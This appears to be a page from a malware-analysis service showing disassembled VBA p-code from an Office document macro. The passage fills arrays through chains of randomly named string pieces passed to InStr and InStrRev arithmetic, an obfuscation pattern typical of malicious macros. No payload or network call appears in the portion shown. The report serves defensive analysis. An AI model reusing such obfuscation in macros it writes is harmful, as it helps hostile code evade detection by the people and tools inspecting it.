' 	Ld cprdShrSowfWToLPA 
' 	Add 
' 	Ld rFoqlh 
' 	Ld WJltliB 
' 	Add 
' 	Ld ObFkfRLBHzPBYJwlobw 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Mul 
' 	Ld jSpucTjS 
' 	Ld BZniLhWi 
' 	Add 
' 	Ld wTISkVjPPkRkKjWihbj 
' 	Add 
' 	Ld obkbmE 
' 	Ld LRwPKWKH 
' 	Add 
' 	Ld DVOjohwzAwCwtdIkztLw 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Div 
' 	Ld TLkDM 
' 	Ld padJAFn 
' 	Add 
' 	Ld nGRAISiasCWsHrdUSzvkn 
' 	Add 
' 	Ld YmjtYU 
' 	Ld FEhnz 
' 	Add 
' 	Ld KmUJEzTmZbTpwsjvuwuXT 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Div 
' 	LitDI2 0x0002 
' 	ArgsSt LwKzZWC 0x0001 
' Line #26:
' 	Dim 
' 	OptionBase 
' 	LitDI2 0x0003 
' 	VarDefn lBnpnfSp
' Line #27:
' 	Ld QdQQE 
' 	Ld TwBnKNiD 
' 	Add 
' 	Ld HjQOAKLRwwmvJjFzQfpw 
' 	Add 
' 	Ld XjFbn 
' 	Ld fdLJWuQ 
' 	Add 
' 	Ld EmBzhBoAidWRjPKdvF 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Ld tKGSoqm 
' 	Ld zKaCuCXW 
' 	Add 
' 	Ld aJbioGZGjnGzUIaiMzOon 
' 	Add 
' 	Ld wPpMnGP 
' 	Ld USbSL 
' 	Add 
' 	Ld fFCrLFmQwnTTMUHKiktvj 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Mul 
' 	LitDI2 0x0000 
' 	ArgsSt lBnpnfSp 0x0001 
' Line #28:
' 	Ld LopLH 
' 	Ld jiilOV 
' 	Add 
' 	Ld CwqSwTziwKAQhlAztFzE 
' 	Add 
' 	Ld BnilCO 
' 	Ld IhwENt 
' 	Add 
' 	Ld pLMzWBwYPOWzQFCvjSN 
' 	Add 
' 	FnInStr 
' 	Ld XiIzoFI 
' 	Ld iPlsr 
' 	Add 
' 	Ld nhNnAVrcECKwbjbZ 
' 	Add 
' 	Ld zHSHHPSB 
' 	Ld KJvskAok 
' 	Add 
' 	Ld QXkDzIioCQSEHnfsACqJFr 
' 	Add 
' 	FnInStr 
' 	Mul 
' 	Ld TLbvr 
' 	Ld ccXPJwU 
' 	Add 
' 	Ld RisEnKFIrGOiLwFcW 
' 	Add 
' 	Ld ZAdiL 
' 	Ld WtjRdsW 
' 	Add 
' 	Ld POAWmzKQOsDMtAKIsaI 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Add 
' 	Ld Zlzat 
' 	Ld HMApNV 
' 	Add 
' 	Ld apNcwKKAoDdiOGUswAB 
' 	Add 
' 	Ld FskrMD 
' 	Ld KpiCNjzz 
' 	Add 
' 	Ld zmqTntEjsctTYFDZkwwJ 
' 	Add 
' 	FnInStr 
' 	Sub 
' 	LitDI2 0x0001 
' 	ArgsSt lBnpnfSp 0x0001 
' Line #29:
' 	Ld sfFIZX 
' 	Ld ZEzjmFqm 
' 	Add 
' 	Ld lPQWJwJuXMdAzvOzWJV 
' 	Add 
' 	Ld uUHKjwiz 
' 	Ld XwCWWIl 
' 	Add 
' 	Ld XmwDUBncnLKPbppMav 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Ld MYFiwZ 
' 	Ld ltsKIzQn 
' 	Add 
' 	Ld oGKFRHOhjSYqhiWkSqkkwa 
' 	Add 
' 	Ld XNiYBD 
' 	Ld iFGGz 
' 	Add 
' 	Ld fLYMDLlNlXqGEfAkqUQ 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Div 
' 	LitDI2 0x0002 
' 	ArgsSt lBnpnfSp 0x0001 
' Line #30:
' 	Dim 
' 	OptionBase 
' 	LitDI2 0x0004 
' 	VarDefn UMZzRd
' Line #31:
' 	Ld DTViq 
' 	Ld wMwRMd 
' 	Add 
' 	Ld RwtiFmQfQiCatnCJBvSmrn 
' 	Add 
' 	Ld OaORhmR 
' 	Ld dUZRnol 
' 	Add 
' 	Ld jnFZvZUIwwMBBBFVwAQ 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Ld MZPNs 
' 	Ld hXkDj 
' 	Add 
' 	Ld ihrNiViPZnQmiPQitNVRM 
' 	Add 
' 	Ld oRoRrFVM 
' 	Ld Gnlnczwq 
' 	Add 
' 	Ld bZRGijBbIPflkhKhiuaIb 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Mul 
' 	LitDI2 0x0000 
' 	ArgsSt UMZzRd 0x0001 
' Line #32:
' 	Ld hrRQXb 
' 	Ld SPzhm 
' 	Add 
' 	Ld jkRYbBFLWohBRpwMCJ 
' 	Add 
' 	Ld lorkR 
' 	Ld sXZdLp 
' 	Add 
' 	Ld iQjlFjSwTQwJkuOZjk 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Ld jotiQj 
' 	Ld ManNvV 
' 	Add 
' 	Ld RBWvRBIHzTiwRzwwz 
' 	Add 
' 	Ld TijzEX 
' 	Ld ikXzIi 
' 	Add 
' 	Ld AiUkWSQiwQVOwZBinMT 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Mul 
' 	LitDI2 0x0001 
' 	ArgsSt UMZzRd 0x0001 
' Line #33:
' 	Ld mkTjLzHf 
' 	Ld wNdct 
' 	Add 
' 	Ld EZHGAIKzzGwbcYwmzjTb 
' 	Add 
' 	Ld SCwLwZI 
' 	Ld Hupplb 
' 	Add 
' 	Ld NABicjcFdHBlTViGjwAX 
' 	Add 
' 	FnInStr 
' 	Ld GUmwjN 
' 	Ld HFanDq 
' 	Add 
' 	Ld jrvAfjXVUCVCaMcVPijWQ 
' 	Add 
' 	Ld diXjRsmC 
' 	Ld bzjWw 
' 	Add 
' 	Ld OKpLhswjUEBCVfFsYpCKiz 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Ld BEjzS 
' 	Ld HGHdw 
' 	Add 
' 	Ld viXiBMwttQDSlMLVpzj 
' 	Add 
' 	Ld lNwOYw 
' 	Ld GwuUm 
' 	Add 
' 	Ld wPELqiOVvHBRbwiDwnPZ 
' 	Add 
' 	FnInStr 
' 	Mul 
' 	Ld fIzTqrMF 
' 	Ld ZsUJmX 
' 	Add 
' 	Ld TRvvhKWmjEKjpjaRBiD 
' 	Add 
' 	Ld EEWjuYQZ 
' 	Ld GGBkamzM 
' 	Add 
' 	Ld BCnkLGwFrzPWcnmkNSfQ 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Mul 
' 	Add 
' 	LitDI2 0x0002 
' 	ArgsSt UMZzRd 0x0001 
' Line #34:
' 	Ld ZNZziER 
' 	Ld uBRmYo 
' 	Add 
' 	Ld TDrrkuwzKcVmsBm 
' 	Add 
' 	Ld MbnfSE 
' 	Ld LBOvnNLM 
' 	Add 
' 	Ld pLfAfupFYPYlmssQMY 
' 	Add 
' 	FnInStr 
' 	Ld EnwvjEvJ 
' 	Ld JwhsLwsp 
' 	Add 
' 	Ld jamQcAmVwrTJOawJAMOpi 
' 	Add 
' 	Ld NIjwXWMi 
' 	Ld AhSjSaq 
' 	Add 
' 	Ld qmTSwPujkRkDodoXZUHb 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Ld MzjchlYM 
' 	Ld Cuqijdq 
' 	Add 
' 	Ld zuztfuplDijLUWNDizsY 
' 	Add 
' 	Ld krnFq 
' 	Ld HcwBPGA 
' 	Add 
' 	Ld zFIGBrZUQPnUzGVdCBjbHAci 
' 	Add 
' 	FnInStr 
' 	Mul 
' 	Add 
' 	Ld WJMVmz 
' 	Ld NBsRTJ 
' 	Add 
' 	Ld qmdrjlQfqTiAIDAaGC 
' 	Add 
' 	Ld zUEQnCl 
' 	Ld CbJpFi 
' 	Add 
' 	Ld tGpwfIQckOTiYEdXcVc 
' 	Add 
' 	FnInStr 
' 	Sub 
' 	LitDI2 0x0003 
' 	ArgsSt UMZzRd 0x0001 
' Line #35:
' 	EndSub 
' Line #36:

Open this report in the interactive analyzer, or submit your own file for analysis.